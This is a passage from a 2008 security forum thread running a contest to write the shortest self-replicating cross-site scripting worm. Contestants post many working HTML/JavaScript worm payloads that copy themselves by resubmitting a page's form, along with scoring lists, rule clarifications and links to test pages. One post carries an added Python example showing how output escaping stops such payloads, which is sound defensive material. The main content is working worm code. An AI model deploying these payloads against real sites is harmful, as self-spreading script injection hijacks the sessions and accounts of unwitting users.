Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 9 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 10:19AM

this is for the.. "doctype" compliant variation:
<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

Ronald&everyone:
I'll update your payloads as soon as I return from breakfast.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 10:37AM

this is the latest count:


.- ma1 (129) [requires the user to focus a field]
.- Spyware (132) [requires the user to focus a field]
.- Spikeman (132) [requires the user to focus a field DOCTYPE ISSUES]
.- .mario (142) <form> (with doctype issues)
.- Ronald (143) <form> (with doctype issues)
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) <form> (with doctype issues)
.- sirdarckcat (160)
.- ma1 (163) <form>
.- ritz (167) <form>
.- babarianbob (168) <form>
.- .mario (178)
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>
.- bwb labs 271 XHR

agreed?

Edited 4 time(s). Last edit at 01/06/2008 12:32PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 11:00AM

.mario and Ronald:
yours will grow

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 06, 2008 11:04AM

mine (164 chars):-

<form><input type=image name=content onerror="alert('XSS');with(p=parentNode)action=(method='post')+'8.php',value='<form>'+p.innerHTML;type='text';p.submit()" src>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 11:06AM

Gareth, yours grows to:

<form><input type="image" name="content" onerror="alert('XSS');with(p=parentNode)action=(method='post')+'.php',value='<form>'+p.innerHTML;type='text';p.submit()" src="">

and doesn't work on Firefox

Edited 4 time(s). Last edit at 01/06/2008 11:08AM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 11:14AM

@SDC

what do you mean with grow? nothing grows, tested multiple times, the payload is exactly as it started, I even made sure the added quotes won't happen in FF.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 11:24AM

I don't get it either - tested it with your judge2 and my script - no growth...

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 11:26AM

@SDC

List is certainly not agreed, and who put you in the place to keep track of this? Did you test those you declined? And if so, better explain what's up with them and not just ignore them.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 11:34AM

Ok, sorry mario, yours doesn't grow on Firefox, but doesn't work on IE, my mistake

Ronald:
Yours grows to:
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>undefined

with an undefined at the end

Edited 1 time(s). Last edit at 01/06/2008 11:34AM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 11:34AM

@.mario:

<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>

confirmed on Apache 1.3.X and above.

Looks like this baby is one of the smallest so far :) awesome job .mario!

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 11:40AM

Ahhh okay, plausible.

here is the update: 143 chars, undefined fixed.

<form id=_><input name='content'><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>



Edited 1 time(s). Last edit at 01/06/2008 11:41AM by Ronald.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 11:40AM

@Ronald: thx - but I meant this:

<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=method='post',i.value='<form>'+innerHTML)</script>

This works on all my Apache 2.2.x instances (unfortunately the rules tell about A1.3.x/A2.x *g*)

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 11:42AM

@.mario

nope :( doesn't work on Apache 1.3.x

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 06, 2008 11:48AM

@sdc

Mine does work on FF I've tested it

Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 06, 2008 11:49AM

sirdarckcat Wrote:
-------------------------------------------------------
> this is the latest count:
>
>
> .- ma1 (129) [requires the user to focus a field]

My 128 modification to this worked in the tests (requiring user interaction: focus/blur).

> .- .mario (142) (with doctype issues)

I missed that one, well done!

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 06, 2008 12:16PM

<form id=_><input name="content"><script>with(_)_[0].value='<form id=_>'+innerHTML,action=(method='post')+'.php',submit(alert('XSS'))</script>

142 (not sure if it's a duplicate, it's becoming difficult to follow)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 12:21PM

@ma1: Yeah .mario had that one already, only the _ was m

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 12:26PM

Ronald:
yours is 142 on IE and 144 on FF

I dunno which number to put on the count hehe, 143 is the score, but 144 is the highest..

This is the content on Firefox:

<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>

and on IE:

<form id=_><INPUT name=content><SCRIPT>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</SCRIPT>

@ma1

yeah, mario had that already

Edited 2 time(s). Last edit at 01/06/2008 12:28PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 06, 2008 12:27PM

When the button name is NOT specified in the input tag (value="name for button"), does IE7 render the button name in the source?

Firefox doesn't do this, but IEtab does. Can someone help me out here?

Thanks,

EDIT,

If it doesn't render (I'm not sure yet), here you go, 141:

ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/ý.ú/);" type="submit">ú</form>



Edited 1 time(s). Last edit at 01/06/2008 12:32PM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 12:31PM

Gareth:
try yours here:
http://loteria-gratis.com.ar/judge2.php

It doesn't pass from count: 2

Edited 1 time(s). Last edit at 01/06/2008 12:31PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 12:32PM

hehe my worm shrinks! LOL

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 12:44PM

Ok, afaik there are 4 possible scores:

Score in the case RSnake says that using user interaction is ok and the DOCTYPE is not an issue:

1.- ma1 (129)
2.- Spyware (132)
3.- Spikeman (132)
4.- .mario (142)
5.- Ronald (143)
6.- sirdarckcat (145)
7.- shawn (153)
8.- ritz (167)
9.- babarianbob (168)
10.- Gareth Heyes (229)
11.- Matt Presson (233)
12.- bwb labs (264)
13.- digi7al64 (266)

Score in the case RSnake says that using user interaction is ok and the DOCTYPE is an issue:

1.- ma1 (129)
2.- Spyware (132)
3.- sirdarckcat (160)
4.- ritz (167)
5.- babarianbob (168)
6.- .mario (178)
7.- Gareth Heyes (229)
8.- Matt Presson (233)
9.- bwb labs (264)
10.- digi7al64 (266)


Score in the case RSnake says user interaction is not allowed and DOCTYPE is not an issue:

1.- .mario (142)
2.- Ronald (143)
3.- sirdarckcat (145)
4.- shawn (153)
5.- ma1 (156)
6.- ritz (167)
7.- babarianbob (168)
8.- .mario (178)
9.- Gareth Heyes (229)
10.- Matt Presson (233)
11.- bwb labs (264)
12.- digi7al64 (266)

Score in the case RSnake says user interaction is not allowed, and doctype is an issue:

1.- sirdarckcat (160)
2.- ma1 (163)
3.- ritz (167)
4.- babarianbob (168)
5.- .mario (178)
6.- Gareth Heyes (229)
7.- Matt Presson (233)
8.- bwb labs (264)
9.- digi7al64 (266)

now.. let's hope that RSnake says user interaction is not allowed, and doctype is an issue :D

Edited 7 time(s). Last edit at 01/06/2008 01:35PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 06, 2008 12:52PM

You know, there's a great difference between EVENTS and USER INTERACTION. OnError does its thing automatically, same goes for OnLoad, and in some cases onChange.

What is not allowed, interaction or events?

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 01:06PM

Gareth:

your worm grows.. a lot on IE and Firefox, the delimiter is not working, I dunno why

*Interaction*

Edited 1 time(s). Last edit at 01/06/2008 01:06PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 06, 2008 01:08PM

sirdarckcat Wrote:
> bwb labs (271)
My latest XMLHttpRequest contribution was not the shortest one ...
See the first original version (193 bytes), and the second with the addition of the Content-Type (264 bytes).
Note that XMLHttpRequest versions might be the only versions that do not have looping problems ...

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 01:18PM

ok, yours is 264, sorry

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 06, 2008 01:22PM

@oxotnick - assume the same directory for now, just to make it easy. That's a good question and wouldn't be the same in all cases, as you point out, but just for simplicity's sake and for ease of testing, let's assume they reside in the same directory.

A few people asked about the user interaction requirement - I'll append the rules for that question. In my mind, this is a best judgment call, rather than a real rule. If you're writing a worm you want it to propagate, not just to run in certain circumstances. So unless the worm works with user interaction like mousing over anywhere in the body tag of a page or something, I don't think we can really consider it a real worm. If someone has to type a novel into a form to get it to work, while technically that's a worm, it's not a particularly good one. So for the purpose of this contest let's just say that it should require no user interaction or user interaction that happens on every single page without the user thinking about it.

Also, about the "growing" limitation and request to rescind that rule. I completely understand why people have issue with that, but if we assume that the size of a worm is important, then we also have to assume the size of the worm continues to be important for propagation purposes. So for this context it stays, although I definitely think the other is worth mentioning if someone just feels like submitting something small that grows (as long as it doesn't exponentially grow) for the kick of it.

Also, I would say code that breaks with a DOCTYPE on the page is a problem as it's commonly included (including this site as a point of reference), and we should assume that all pages have a body tag since that's ubiquitously used.



Edited 1 time(s). Last edit at 01/06/2008 01:35PM by rsnake.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 06, 2008 01:29PM

Ah just to solve some doubts.. and not repeating them to everyone in private:

1.- The scores are NOT OFFICIAL, I mean, I'm putting them because I wanted to know in which place I am, but they may be different from what RSnake says!, so, I repeat THEY ARE NOT OFFICIAL!!!!

2.- The JUDGES, are "NOT OFFICIAL", the result the judges make is just so you can test your codes!! and that's the way I'm making the scores, but I repeat they are also NOT OFFICIAL.. they are just to help us out..

3.- The difference between JUDGE1 and JUDGE2 is:
JUDGE1 has a DOCTYPE http://loteria-gratis.com.ar/judge1.php
JUDGE2 doesn't! http://loteria-gratis.com.ar/judge2.php

4.- The source code of judge1 and judge2 is here:
judge1: http://loteria-gratis.com.ar/judge1.php?sc
judge2: http://loteria-gratis.com.ar/judge2.php?sc

5.- If your code loops, you have to delete your session here:
http://loteria-gratis.com.ar/judge1.php?logout

6.- For the <form> style replication worms, the count should increase every time the alert appears.

7.- For the XHR style replication worms, you have to manually reload the page to see if the Count is increasing.

8.- For the user-interaction event style replication worms, there's a button at the bottom of the page that says trigger events.. that should trigger your event automatically. rsnake says those are not valid, so.. forget it

that's all.

Greetz!!

Edited 1 time(s). Last edit at 01/06/2008 01:31PM by sirdarckcat.

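The judge pages described in the post above only work as a worm test bed because the stored "content" field is written straight back into the HTML, where the browser parses it as markup. The following is an added example written for this thread, not sirdarckcat's judge1.php/judge2.php source and not any contestant's code: it builds a constructed stand-in page that echoes a stored submission either raw or HTML-escaped, and then walks the result with Python's html.parser to list every construct that would execute (script elements and on* handler attributes). The two sample submissions are constructed for the demo, not contest entries; the doctype flag only mirrors the judge1/judge2 distinction and is an assumption about how such a page might differ.

```python
import html
from html.parser import HTMLParser

# Constructed sample submissions (not contest entries): one script-based and
# one event-handler-based, the two execution routes the thread's payloads use.
SAMPLE_SCRIPT = "<form><input name=content><script>alert('XSS')</script></form>"
SAMPLE_HANDLER = "<img src onerror=\"alert('XSS')\">"


def render_page(stored_content, escape, doctype=True):
    """Constructed stand-in for a judge-style page that echoes the last post.

    escape=False mirrors the behaviour the contest relies on (raw echo of the
    stored field); escape=True applies HTML body-context output encoding.
    The doctype flag is an assumption mirroring judge1 vs judge2; it has no
    bearing on whether escaped text can execute."""
    shown = html.escape(stored_content, quote=True) if escape else stored_content
    head = "<!DOCTYPE html>\n" if doctype else ""
    return (
        f"{head}<html><body>\n"
        f"<div id=post>{shown}</div>\n"
        f"<form method=post action=judge.php><input name=content></form>\n"
        f"</body></html>"
    )


class ActiveContentFinder(HTMLParser):
    """Collects markup that would run script when the page is parsed:
    <script> elements and any on* event-handler attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names for us.
        if tag == "script":
            self.findings.append(("script", None))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append((f"{tag}@{name}", value))


def active_content(page_html):
    """Return every executable construct the browser would see in page_html."""
    finder = ActiveContentFinder()
    finder.feed(page_html)
    finder.close()
    return finder.findings


def can_replicate(stored_content, escape):
    """True when the rendered page would execute the stored submission,
    which is the precondition every worm in the thread relies on."""
    return bool(active_content(render_page(stored_content, escape=escape)))


if __name__ == "__main__":
    for sample in (SAMPLE_SCRIPT, SAMPLE_HANDLER):
        print(f"raw echo executes: {can_replicate(sample, escape=False)}, "
              f"escaped echo executes: {can_replicate(sample, escape=True)}")
```

With the raw echo, both samples show up as executable content; with html.escape applied to the stored field, the same submissions come back as inert text (&lt;script&gt; and friends) and the parser finds nothing, regardless of DOCTYPE. That is the point the whole thread turns on: the size and browser quirks of the payloads only matter because the page fails to encode its output.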
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 06, 2008 01:37PM

Right, nothing is official until people submit them and say that's their final submission on the 10th. Anything before then I'm assuming is test code due to the sheer volume of revisions going on. I think it's really helpful to have running counts though, so people can see where things are. It'll also help people understand what's required to win at whatever point the chars are tallied. Thanks, Sirdarckcat!

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 06, 2008 01:40PM

RSnake Wrote:
> If someone has to type a novel into a form to get it to work, while technically that's a worm, it's not a particularly good one.

lol, this will be a classic ^^
